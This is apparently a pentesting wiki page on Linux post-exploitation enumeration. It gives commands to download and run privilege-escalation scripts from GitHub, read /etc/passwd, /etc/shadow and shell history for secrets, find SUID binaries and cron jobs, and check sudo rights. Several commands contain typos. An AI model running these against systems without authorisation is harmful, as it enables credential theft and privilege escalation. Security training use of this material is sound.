#
Linux Enumeration
This wiki part is about Manual and Auto recon process that you might use during your pentesting assessments.
#
Auto - Recon
#
linpeas.sh
curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh -O linpeas.sh; chmod 700 linpeas.sh
#
LSE
wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh;chmod 700 lse.sh
#
Linenum
wget "https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh" -0 linenum.sh;chmod 700 linenum.sh
#
Enum4linux
enum4linux -a <IP>
#
Linux Exploit suggester
wget "https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh" -O les.sh
#
Manual - Recon
#
Users
Check the different users and groups from this system. Which user is your next target.
whoami
ld
cat /etc/passwd
ls -al /etc/shadow- If you get a hash somewhere --> JohnTheRipper or Hashcat
#
History
Some commands may contains credentials and secrets. It's always worth a shot.
cat ~/.bash_historyPro Tip
If you don't want to save a sensitive command in your history file, you can add a space at the beginning.
<space> export $PASSWORD=p4ssw0rd
#
Sudo Version & Rights
Can be useful to validate the sudo version, some of them are vulnerable and can be easy root access.
sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]"It's also interesting to check the sudo rights of your current user and elevate your privileges maybe.
sudo -lIf the user is NOPASSWD: ALL on sudoers.
sudo -u admin bash -i
#
SUID
Looking for weird permissions on binaries that may lead to a privesc.
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/
find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 -user root 2>/dev/null79ldd /usr/bin/binary-nam
#
SUID Suspect
strace /usr/local/bin/weirdbinary 2>&1 | grep -iE "open|access|no suchfile"
#
Linux kernel & versions
Looking for good old CVE on the linux version.
cat /etc/issue
cat /etc/*-release
cat /proc/version
uname -a
#
Applications installed
Some applications can be usefull for post-exploit and exfiltration.
which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null
dpkg -l
#
Compiler
You may need to compile your C payloads.
(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/")
#
RW-files
ls -la
find / -type f -user <username> -readable 2> /dev/null # Readable files for username
find / -writable -type d 2>/dev/null # Writable files by the user
find /usr/local/ -type d -writable
#
Process list
List the running process and also from which user. It can detect cronjobs or running services that you may exploit.
ps -aux
#
Internal ports
Some services are probably running in the machine, exposed to the network or only from Localhost.
Netstat -alnp | grep LIST | grep port_num
Netstat -antp
netstat -tulnp
#curl the listening ports
(netstat -punta || ss --ntpu) | grep "127.0"
#
Crontab
Automated cronjobs can be exploited if the rights are messed up with the executed binaries or folders.
ls -lah /etc/cron*
cat /etc/crontab
ls -la /var/log/cron* # Locating cron logs
find / -name cronlog 2>/dev/null
grep "CRON" /var/log/cron.log # for locating running jobs from logs
grep CRON /var/log/syslog # grepping cron from syslog
#
Mounted drives
These drives can contain secrets or sensitive informations for your post-exploitation.
mnt /media # usb devices and other mounted disks
mount # show all the mounted drives
df -h # list all partitions
cat /etc/fstab # list all drives mounted at boot time
/bin/lsblk
#
Firewall rules
Always good to know what are your restrictions on this machine.
grep -Hs iptables /etc/*